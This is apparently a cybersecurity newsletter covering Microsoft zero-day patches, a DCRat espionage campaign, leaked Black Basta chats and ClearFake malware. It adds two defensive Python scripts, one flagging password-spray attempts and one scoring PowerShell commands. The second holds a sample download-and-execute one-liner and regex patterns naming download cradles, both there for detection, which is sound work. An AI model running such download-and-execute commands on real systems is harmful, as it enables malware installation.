Mar 21 2025
Welcome to Gone Phishing, your weekly cybersecurity newsletter that’s popping like fresh 🍞🥖🥨🍰🧁
Patch of the Week! 🩹
First things first, folks. Our weekly segment goes by many names. Patch of the Week, Tweak of the Week. Okay, that’s it… 😳
Congrats to Windows, the cybercriminals are no match… for your patch! 🩹
Check out this freshly hatched patch 🐣
🛡️ Microsoft Patch Tuesday: 57 Bugs Fixed, 6 Zero-Days Under Attack! 💀
Microsoft just dropped 57 security patches, including 6 zero-days being actively exploited! ⚠️
Top risks include:
Win32 Kernel exploit (CVE-2025-24983) lets attackers gain SYSTEM privileges.
File system flaws allowing data theft & remote code execution.
Microsoft Management Console bypass (CVE-2025-26633) to evade security protections.
The U.S. CISA has added these to its Known Exploited Vulnerabilities (KEV) list, giving agencies until April 1, 2025 to patch. If you haven’t updated yet, do it NOW to stay protected! 🔒
Now, on to this week’s hottest cybersecurity news stories:
🐀 Dark Crystal targets Ukraine 🎯
👾 Basta crimes spreads Evel Knievel 🏍️
🔎 ClearFake it before you make it ☠️
The Computer Emergency Response Team of Ukraine (CERT-UA) warns of a new cyber espionage campaign deploying Dark Crystal RAT (DCRat) against defense industry employees and military personnel.
🚨 How the Attack Works
🔹 Malicious messages sent via Signal 📲
🔹 Compromised accounts used to increase trust 🕵️‍♂️
🔹 Fake meeting minutes sent as archive files 📁
🔹 Contains a decoy PDF + DarkTortilla crypter 🎭
🔹 Decryption leads to full remote access via DCRat 💻
🕵️ Who’s Behind It?
CERT-UA attributes the attack to UAC-0200, active since mid-2024.
🔥 Why It’s Dangerous
✅ DCRat executes arbitrary commands 🛠️
✅ Steals sensitive data & credentials 🔑
✅ Grants attackers remote control over infected systems
🌍 Cyber Tensions & Signal Controversy
🔸 Reports claim Signal is no longer assisting Ukrainian authorities in countering Russian cyber threats
🔸 Signal denies these claims, stating it does not collaborate with any government
🔐 How to Stay Safe
✅ Be cautious of unexpected Signal messages 🚧
✅ Verify senders before opening attachments
✅ Use endpoint protection & monitor for unauthorized activity 🔍
Russian-linked cyber actors are increasingly targeting secure messaging platforms—stay vigilant and protect sensitive data! 🚨
Explore this ready-to-go guide to support your IT operations in 130+ countries. Discover how:
Standardizing global IT operations enhances efficiency and reduces overhead
Ensuring compliance with local IT legislation safeguards your operations
Integrating Deel IT with EOR, global payroll, and contractor management optimizes your tech stack
Leverage Deel IT to manage your global operations with ease.
🕵️ Leaked Black Basta Chats Reveal Russian Ties & Cybercrime Expansion
A leak of 200,000 internal chat messages from the Black Basta ransomware gang suggests possible links to Russian authorities and major cybercrime operations.
🚨 Key Revelations
🔹 Leader Oleg Nefedov (GG/AA) allegedly escaped arrest in Armenia with Russian officials’ help
🔹 Two suspected offices in Moscow 🏢
🔹 Used ChatGPT for fraud, malware development, and debugging 🤖
🔹 Overlaps with other ransomware gangs (Rhysida, CACTUS) 🎭
🔹 Developed a custom C2 framework (“Breaker”) for persistence & stealth
🔥 Brute-Force Attacks with BRUTED
🔹 Custom tool “BRUTED” automates credential stuffing 🔑
🔹 Targets firewalls, VPNs, & edge network devices
🔹 Used since 2023 for large-scale password attacks
🕵️ What’s Next for Black Basta?
🔸 Possible rebrand with new ransomware based on Conti’s code
🔸 Heavy investment in automated cyberattacks
🔸 Scaling credential theft & network infiltration
🔐 How to Stay Protected
✅ Enforce strong, unique passwords & MFA 🔄
✅ Monitor for unusual login attempts & brute-force attacks 🔍
✅ Patch firewalls & VPNs to prevent exploitation 🔥
With growing automation & state-level connections, Black Basta remains a top ransomware threat—organizations must stay ahead! 🚧
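Here’s an added example (not from the newsletter, and not from any vendor or researcher it cites) of what "monitor for unusual login attempts & brute-force attacks" can look like in practice. It reads a VPN gateway’s auth log, slides a five-minute window over each source IP’s failed logins, and separates a password spray / credential-stuffing run (many accounts from one source) from a single-account brute force. It also flags the case that matters most: a login that succeeded right after the burst. The log format, usernames and IP addresses are all constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log (not real data): a VPN gateway's auth log.
# One source sprays five accounts in five seconds and then gets in as "frank";
# another hammers a single account; a third is an ordinary user who mistyped once.
SAMPLE_LOG = """\
2025-03-20T09:00:01Z vpn-gw auth: user=alice src=203.0.113.10 result=FAIL
2025-03-20T09:00:02Z vpn-gw auth: user=bob src=203.0.113.10 result=FAIL
2025-03-20T09:00:03Z vpn-gw auth: user=carol src=203.0.113.10 result=FAIL
2025-03-20T09:00:04Z vpn-gw auth: user=dave src=203.0.113.10 result=FAIL
2025-03-20T09:00:05Z vpn-gw auth: user=erin src=203.0.113.10 result=FAIL
2025-03-20T09:00:06Z vpn-gw auth: user=frank src=203.0.113.10 result=OK
2025-03-20T09:10:00Z vpn-gw auth: user=alice src=198.51.100.7 result=FAIL
2025-03-20T09:11:00Z vpn-gw auth: user=alice src=198.51.100.7 result=OK
2025-03-20T09:30:00Z vpn-gw auth: user=grace src=192.0.2.44 result=FAIL
2025-03-20T09:30:10Z vpn-gw auth: user=grace src=192.0.2.44 result=FAIL
2025-03-20T09:30:20Z vpn-gw auth: user=grace src=192.0.2.44 result=FAIL
2025-03-20T09:30:30Z vpn-gw auth: user=grace src=192.0.2.44 result=FAIL
2025-03-20T09:30:40Z vpn-gw auth: user=grace src=192.0.2.44 result=FAIL
2025-03-20T09:30:50Z vpn-gw auth: user=grace src=192.0.2.44 result=FAIL
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) \S+ auth: user=(?P<user>\S+) src=(?P<src>\S+) result=(?P<result>\w+)$"
)


def parse_line(line):
    """Return a dict for one log line, or None if the line does not match the format."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.strptime(ev["ts"], "%Y-%m-%dT%H:%M:%SZ")
    return ev


def detect_login_abuse(lines, window=timedelta(minutes=5), min_failures=5, min_users=3):
    """Flag sources with >= min_failures failed logins inside any sliding window.

    A flagged source is classed as a password spray / credential-stuffing run when
    the failures hit >= min_users distinct accounts, otherwise as single-account
    brute force.  success_after marks a login that succeeded after the burst, which
    is the case that needs an immediate response rather than just a rate limit.
    """
    by_src = defaultdict(list)
    for line in lines:
        ev = parse_line(line)
        if ev:
            by_src[ev["src"]].append(ev)

    alerts = []
    for src in sorted(by_src):
        events = sorted(by_src[src], key=lambda e: e["ts"])
        failures = [e for e in events if e["result"] == "FAIL"]
        best = None
        start = 0
        for end in range(len(failures)):
            # Advance the window start until every failure in [start, end] fits in the window.
            while failures[end]["ts"] - failures[start]["ts"] > window:
                start += 1
            count = end - start + 1
            if count >= min_failures and (best is None or count > best["failures"]):
                best = {
                    "src": src,
                    "failures": count,
                    "users": sorted({e["user"] for e in failures[start:end + 1]}),
                    "first": failures[start]["ts"],
                    "last": failures[end]["ts"],
                }
        if best is None:
            continue
        best["kind"] = "password_spray" if len(best["users"]) >= min_users else "brute_force"
        best["success_after"] = any(
            e["result"] == "OK" and e["ts"] >= best["last"] for e in events
        )
        alerts.append(best)
    return alerts


if __name__ == "__main__":
    for a in detect_login_abuse(SAMPLE_LOG.splitlines()):
        flag = "  <-- SUCCESSFUL LOGIN AFTER BURST" if a["success_after"] else ""
        print(f"{a['src']}: {a['kind']} {a['failures']} failures, "
              f"{len(a['users'])} accounts, {a['first']:%H:%M:%S}-{a['last']:%H:%M:%S}{flag}")
```

Run it as-is and the sprayer at 203.0.113.10 is reported as a password spray with a successful login afterwards, 192.0.2.44 as a plain brute force, and the user who mistyped once is left alone. Tune the window and thresholds to your gateway’s normal failure rate, and feed the `success_after` alerts straight to incident response rather than to a rate limiter.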
🎭 ClearFake Uses Fake reCAPTCHA to Spread Malware
The ClearFake campaign is tricking users with fake reCAPTCHA and Cloudflare Turnstile verifications, leading them to download Lumma Stealer and Vidar Stealer malware. At least 9,300 websites have been compromised.
🔥 How the Attack Works
🔹 Users visit a hacked site—JavaScript loads from Binance Smart Chain (BSC) 📜
🔹 Victim is tricked into running malicious PowerShell (ClickFix technique)
🔹 Deploys Emmenhtal Loader (PEAKLIGHT) → Drops Lumma Stealer
🔹 New variant encrypts HTML & expands Web3 capabilities 🕵️‍♂️
⚠️ Why This Is Dangerous
✅ Uses blockchain (BSC) for resilience & stealth
✅ Compromised over 9,300 sites & exposed 200,000+ users
✅ Targets both Windows & macOS users
✅ Frequently updated to evade detection
🛡️ How to Stay Safe
✅ Never download "browser updates" from pop-ups 🚫
✅ Be cautious of CAPTCHA prompts on unfamiliar sites
✅ Monitor PowerShell execution & network traffic 🔍
✅ Keep browsers & security tools updated
With widespread infections & rapid evolution, ClearFake remains a major global threat—stay vigilant! 🚨
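Here’s an added example (not from the newsletter, and not from any vendor or researcher it cites) of what "monitor PowerShell execution" can look like: a small triage script that scores process-creation events (the fields you’d get from a parsed Sysmon event 1 or Windows 4688 record) on well-known command-line indicators such as an encoded command, a hidden window, an execution-policy bypass or a download cradle, adds parent-process context, and decodes any `-EncodedCommand` payload so the analyst can read it. The events are constructed for the example; the assumption that a PowerShell launched straight from explorer.exe is the shape of a ClickFix-style "paste this into Run" lure is mine, not something the newsletter states.

```python
import base64
import re

# Constructed sample process-creation events (not real telemetry): roughly what a
# Sysmon event 1 / Windows 4688 record carries once parsed into fields.
SAMPLE_EVENTS = [
    {"id": 1, "parent": "cmd.exe",
     "cmdline": r'powershell.exe -File C:\scripts\backup.ps1'},
    {"id": 2, "parent": "explorer.exe",
     "cmdline": 'powershell.exe -w hidden -ep bypass -c "iex (iwr \'https://example.invalid/v.txt\')"'},
    {"id": 3, "parent": "winword.exe",
     "cmdline": "powershell.exe -NoP -W Hidden -enc VwByAGkAdABlAC0ASABvAHMAdAA="},
    {"id": 4, "parent": "svchost.exe",
     "cmdline": r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\ProgramData\mgmt\inventory.ps1"},
]

# Each indicator: (name, weight, compiled regex over the command line).
CMDLINE_INDICATORS = [
    ("encoded_command", 3, re.compile(r"(?:^|\s)-e(?:c|n|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{8,}", re.I)),
    ("hidden_window", 2, re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("execution_policy_bypass", 2, re.compile(r"-e(?:p|x|xec|xecutionpolicy)\s+bypass", re.I)),
    ("download_cradle", 3, re.compile(
        r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b|"
        r"net\.webclient|start-bitstransfer|\bcurl\b|\bwget\b", re.I)),
    ("invoke_expression", 2, re.compile(r"\biex\b|invoke-expression", re.I)),
    ("no_profile", 1, re.compile(r"-nop\b|-noprofile", re.I)),
]
# Parent-process context.  explorer.exe as parent means the command was typed or
# pasted into the Run dialog or a shell by the user, which is the ClickFix shape
# (assumption made here, not stated in the newsletter).  Office parents are the
# classic malicious-document shape.
SHELL_PARENTS = {"explorer.exe"}
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
ENCODED_ARG_RE = re.compile(r"(?:^|\s)-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{8,})", re.I)


def decode_encoded_command(cmdline):
    """Decode an -EncodedCommand payload (base64 of UTF-16LE) so an analyst can read it."""
    m = ENCODED_ARG_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le", errors="replace")
    except ValueError:
        return None


def assess_event(ev):
    """Score one process-creation event and list the indicators that fired."""
    indicators, score = [], 0
    for name, weight, rx in CMDLINE_INDICATORS:
        if rx.search(ev["cmdline"]):
            indicators.append(name)
            score += weight
    parent = ev.get("parent", "").lower()
    if parent in SHELL_PARENTS:
        indicators.append("shell_parent")
        score += 2
    if parent in OFFICE_PARENTS:
        indicators.append("office_parent")
        score += 3
    return {"id": ev["id"], "score": score, "indicators": indicators,
            "decoded": decode_encoded_command(ev["cmdline"])}


def triage(events, threshold=5):
    """Return the events worth an analyst's attention, highest score first."""
    hits = [r for r in (assess_event(e) for e in events) if r["score"] >= threshold]
    return sorted(hits, key=lambda r: -r["score"])


if __name__ == "__main__":
    for r in triage(SAMPLE_EVENTS):
        print(f"event {r['id']}: score {r['score']} {r['indicators']}")
        if r["decoded"]:
            print(f"  decoded: {r['decoded']}")
```

The scoring is deliberately additive rather than one-hit: a signed management script that runs with `-ExecutionPolicy Bypass` from a service (event 4) stays under the threshold, while the user-pasted hidden download-and-execute one-liner (event 2) and the Office-spawned encoded command (event 3) float to the top. In a real deployment the weights belong in a rule file your SOC can tune, and the decoded payload goes into the alert so nobody has to decode it by hand.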
🗞️ Extra, Extra! Read all about it! 🗞️
Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!
🛡️ Tl;dr sec: Join 30,000+ security professionals getting the best tools, blog posts, talks, and resources right in their inbox for free every Thursday 📅
💵Crypto Pragmatist: Crypto made simple. Actionable alpha in 5 minutes, 3x a week. Join 47,000+ investors and insiders, for 🆓
📈Bitcoin Breakdown: The best in Bitcoin, carefully curated by an alien from the future 👾
Let us know what you think.
So long and thanks for reading all the phish!